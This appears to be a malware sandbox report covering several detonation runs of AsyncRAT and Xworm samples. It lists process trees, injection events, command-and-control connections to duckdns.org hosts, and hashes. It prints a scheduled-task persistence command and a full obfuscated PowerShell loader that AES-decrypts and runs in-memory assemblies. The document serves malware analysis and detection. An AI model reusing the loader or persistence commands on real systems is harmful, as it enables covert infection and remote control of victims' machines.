PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fresh.exe

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp

Files

Analysis: behavioral8

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 408 wrote to memory of 528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1528 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1528 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3964 wrote to memory of 4204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3964 wrote to memory of 4204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3964 wrote to memory of 4204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 19.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 bagdg.duckdns.org udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 bagdg.duckdns.org udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 bagdg.duckdns.org udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp

Files

memory/3964-0-0x0000000002AF0000-0x0000000002B26000-memory.dmp

memory/3964-1-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/3964-3-0x0000000005020000-0x0000000005030000-memory.dmp

memory/3964-2-0x0000000005020000-0x0000000005030000-memory.dmp

memory/3964-4-0x0000000005660000-0x0000000005C88000-memory.dmp

memory/3964-5-0x0000000005460000-0x0000000005482000-memory.dmp

memory/3964-6-0x0000000005D40000-0x0000000005DA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5rillfw.try.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3964-7-0x0000000005DB0000-0x0000000005E16000-memory.dmp

memory/3964-17-0x0000000005F00000-0x0000000006254000-memory.dmp

memory/3964-18-0x0000000006310000-0x000000000632E000-memory.dmp

memory/3964-19-0x0000000006340000-0x000000000638C000-memory.dmp

memory/3964-20-0x0000000006890000-0x00000000068D4000-memory.dmp

memory/3964-21-0x0000000007420000-0x0000000007496000-memory.dmp

memory/3964-22-0x0000000007D20000-0x000000000839A000-memory.dmp

memory/3964-23-0x00000000076C0000-0x00000000076DA000-memory.dmp

memory/4204-24-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/4204-25-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4204-26-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4204-38-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/3964-39-0x0000000005190000-0x00000000051A4000-memory.dmp

memory/3964-41-0x00000000051B0000-0x00000000051C2000-memory.dmp

memory/3964-40-0x00000000051A0000-0x00000000051AE000-memory.dmp

memory/3964-43-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/3964-44-0x0000000005020000-0x0000000005030000-memory.dmp

memory/3964-45-0x0000000005020000-0x0000000005030000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

122s

Max time network

127s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1

Network

N/A

Files

memory/1456-4-0x000000001B360000-0x000000001B642000-memory.dmp

memory/1456-5-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

memory/1456-6-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-7-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-8-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-9-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-10-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-11-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-12-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-13-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-14-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-15-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-16-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-17-0x0000000002B00000-0x0000000002B80000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

110s

Max time network

187s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3604 created 3500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/3604-0-0x0000013AFAFE0000-0x0000013AFB002000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4zvze4pc.cwp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3604-10-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3604-11-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-12-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-13-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3604-14-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-15-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-16-0x0000013A90600000-0x0000013A90654000-memory.dmp

memory/3604-17-0x0000013A906B0000-0x0000013A90704000-memory.dmp

memory/3440-18-0x00000135D0C70000-0x00000135D0C80000-memory.dmp

memory/3440-19-0x00000135D28A0000-0x00000135D28B0000-memory.dmp

memory/3440-20-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3440-21-0x00000135EB320000-0x00000135EB330000-memory.dmp

memory/3440-22-0x00000135EB320000-0x00000135EB330000-memory.dmp

memory/3604-25-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3604-26-0x0000013A906B0000-0x0000013A90704000-memory.dmp

memory/3440-27-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3440-28-0x00000135EB320000-0x00000135EB330000-memory.dmp

memory/3440-29-0x00000135EB320000-0x00000135EB330000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

158s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

